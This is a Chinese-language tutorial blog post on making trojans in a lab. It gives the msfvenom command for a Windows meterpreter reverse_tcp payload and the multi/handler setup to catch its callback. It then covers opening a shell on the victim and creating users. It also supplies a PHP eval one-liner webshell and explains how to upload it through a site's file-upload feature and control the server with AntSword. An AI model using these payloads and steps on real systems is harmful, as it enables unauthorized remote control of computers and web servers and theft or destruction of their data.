生成木马和一句话木马

发布时间:2026/7/22 20:19:01
生成木马和一句话木马 生成木马一、简单知识介绍msfveonm简单介绍它是kali自带、MetasploitMSF框架里的木马生成工具简单说专门制作各种系统的后门木马文件生成木马和一句话木马的区别生成木马需要执行触发、反向连接是二进制/脚本型独立后门程序用脚本语言写的、单独一个文件就能完整实现远程控制不需要依赖网站、其他软件环境的后门文件。一句话木马是web服务端代码片段依赖Web容器解析、HTTP请求触发。二、实验操作1、打开kali进入终端2、先用ifconfig查看自己的ip后面命令要用到ip这里是我这里的ip要以实际ip为准3、输入msfvenom -p windows/x64/meterpreter/reverse_tcp lhost自己真实的攻击机的ip lport任意写个1024~65535这间的端口 -f 生吃的类型 -o 生成的位置加名字//这里介绍端口范围端口数字是0~655350~1023是特权端口系统自带服务占用1024~65535是普通端口可以随便选个用于反弹木马。4、找到生成的木马把木马拖到真实的电脑桌面5、输入msfconsole进入6、输入use exploit/multi/handler 这个使用的模块用于打开端口等着木马主动连过来没有它就接不到会话然后再按照下面图片输入命令lhost和lport要输入自己设置的不要盲目按照主包的这个无脑敲7、再双击桌面上的木马就会像图二一样这就是成功了8、在输入shell就能进入目标主机的c盘下那么后面就能创建用户等等操作一句话木马一、简单知识介绍一句话木马它是一种极简化的网页后门程序俗称网页后门通常写成?php eval($_POST[‘cmd’]);?。它的原理是利用eval()函数把收到的文本当成系统命令执行再通过蚁剑发送命令就能操控服务器。它的作用是拿到网站服务器权限、上传下载文件、查看源码、执行系统命令、提权指低权限普通账号利用系统漏洞升级成最高管理员root权限入侵整台服务器。区分木马、病毒、漏洞病毒是需依附宿主程序、具备自我复制能力的恶意代码。木马是伪装成合法软件、无自我复制能力但是可以远程控制的恶意程序。漏洞是系统硬件或策略中存在的缺陷可被利用进行未授权访问或破坏。二、实验操作1、创建个文档写个一句话木马2、上传到含有上传功能的网页将木马上传复制路径3、右键点击add将路径粘贴到蚁剑测试连接显示成功则再点击Add添加显示添加成功4、双击添加的连接配置记录可以查看目录蚁剑点击Add添加的是WebShell连接配置记录。其本质是一条远程后门的连接配置用来保存你要控制的目标网站后门信息。这个后门术语叫WebShell(一句话木马),双击这条添加好的记录蚁剑就会通过网络和服务器上的WebShall建立通信通道实现浏览、上传、删除网站服务器的所有文件等等。